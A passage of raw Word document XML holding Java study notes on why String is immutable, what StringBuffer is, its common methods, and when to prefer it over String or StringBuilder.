          <w:p w14:paraId="0C3DB37B"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61B1FF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aster in single-threaded apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="00770679" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="654D4283"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ffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FFD8876"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1C68EDC9"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or multi-threaded environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71400A40" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95"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r w:rsidR="0038254F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD98D5"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3D2707"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F16EE"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2AEF64B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CF728BB"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World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2518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E5BE1" w14:textId="763F79CB"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B462C" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95"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7B8E2906" w14:textId="3D37D7B9" w:rsidR="00A8268C" w:rsidRPr="00CE4B95" w:rsidRDefault="00571725">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc197867232"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why </w:t>
      </w:r>
      <w:r w:rsidR="00570340"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tring </w:t>
      </w:r>
      <w:r w:rsidR="008115F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>immutable in java</w:t>
      </w:r>
      <w:r w:rsidR="00A8268C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="2C5A3CDD" w14:textId="150B21F0" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00AA4E40">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is String immutable in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDDA362"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 xml:space="preserve">Because once a String object is created, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>its value cannot be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Any operation that seems to "modify" a string actually creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1A9CF"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But WHY did Java make Strings immutable?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6279E"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Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAA8A6"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are widely used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>file paths, network connections, class loading, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4B063"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If a String were mutable, someone could change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBF604"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Original path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79C036"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ome/user/app"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CF0B1" w14:textId="70F5BFF6"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Imagine someone changes it to a malicious path!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB2941" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="0078764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String Pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1CC13"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uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2EA48F"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strings don't change, they can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>safely shared</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> among many references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB0442"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74CF0E99"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F28E5C" w14:textId="13E69021"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 Same object in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687301D7"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Thread Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABB9BD"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objects are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380167CB"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No need for synchronization since their state can’t change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F7B24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Multiple threads can safely use the same String object without causing issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41805931"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HashCode Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04761333"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String is often used as a key in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap, HashSet, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB2CB9"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the value never changes, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode stays constant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring map integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663559D0"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7C367BE"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC33348" w14:textId="1CA11A16"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// If "key" changed, we couldn't retrieve "value" reliably!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9AD9CE"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Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561092A"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JVM optimizes the use of strings due to immutability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A96C93"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Reuse from the pool and predictable behavior helps the JVM optimize better.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6F9F4"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of how it's immutable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADE271"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34D4B81C"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FA7D75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 Original string unchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F5716B" w14:textId="3DE49963"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s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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> but doesn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'t change s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A65F3E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Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCB0A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e String class has a private final char array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18052D"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B81D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3240A997" w14:textId="5F6DB010"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462CEBD"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final → reference to the array can't change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA20606"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private → can't access directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCDDF8E" w14:textId="1DB3EA13"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at its core </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54064072"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CE4B95" w14:paraId="6066DAE4" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40C0326F"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85BAF75"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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="732A2EBD" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E850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ecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5D2390"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Prevents sensitive data manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="1C59470F" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34500A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tring Pooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA775A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Enables memory-efficient reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="7E91EF57" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2807D7B4"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read Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FEAD248"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Can be shared between threads without risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="2980BD3B" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F97DEFB"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HashCode Stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40521F1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Reliable use in HashMap, HashSet, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="1A62F8EE" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE85986"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JVM Optimization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EBF426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Better performance due to predictability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61F48CF0"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CE4B95" w:rsidRDefault="00DB1645">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc197867233"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is StringBuffer?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="15BD83B4" w14:textId="14C02BC6" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B20079">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ffer in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227246A4"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class used to create and manipulate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strings of characters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150CC88A"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Unlike String, which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StringBuffer objects </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without creating new objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26760A23"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods are synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so multiple threads can use it safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F9671"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claration &amp; Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253168E9"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927361"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3FBD4F0" w14:textId="39D743D6"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1C28B81F" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>append() modifies the original object itself, no new object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C48A3"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7AEB8B13" w14:textId="3512F088"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E4B95" w14:paraId="2D9082B6" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39434D64"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5FCC7F9"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C12F79" w:rsidRPr="00CE4B95" w14:paraId="21A2FA62" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BF33F22"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5DC9CBF9"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C12F79" w:rsidRPr="00CE4B95" w14:paraId="0E3A9852" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046C3CC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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4765249E"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Methods are synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w14:paraId="3540B409" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78F229DF"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Grows as needed (like a resizable array)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w14:paraId="2514857A" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E4786E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Due to synchronization overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13BB4773" w14:textId="40CA57C4"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lastRenderedPageBreak/>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Common Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC83A4"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9E2EFE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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219B1FB"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ert at index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDADD8"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place part of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393122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lete part</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B73F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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C03B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A57A40" w14:textId="1DEEEE5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p>
    <w:p w14:paraId="0EC962CF"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ffer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE058E4"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Use StringBuffer when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF1DC9"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p>
    <w:p w14:paraId="41E684A2"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are working in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B01CF"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You don’t want to use manual synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61013C90"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099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D3C6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6A82F7F5"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable + thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of string manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F6937"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Prefer StringBuilder in single-threaded contexts for better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76243C71"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Use String when data is constant and doesn't change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B133A64" w14:textId="0DC30409" w:rsidR="00B7737D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="5CADAC97">
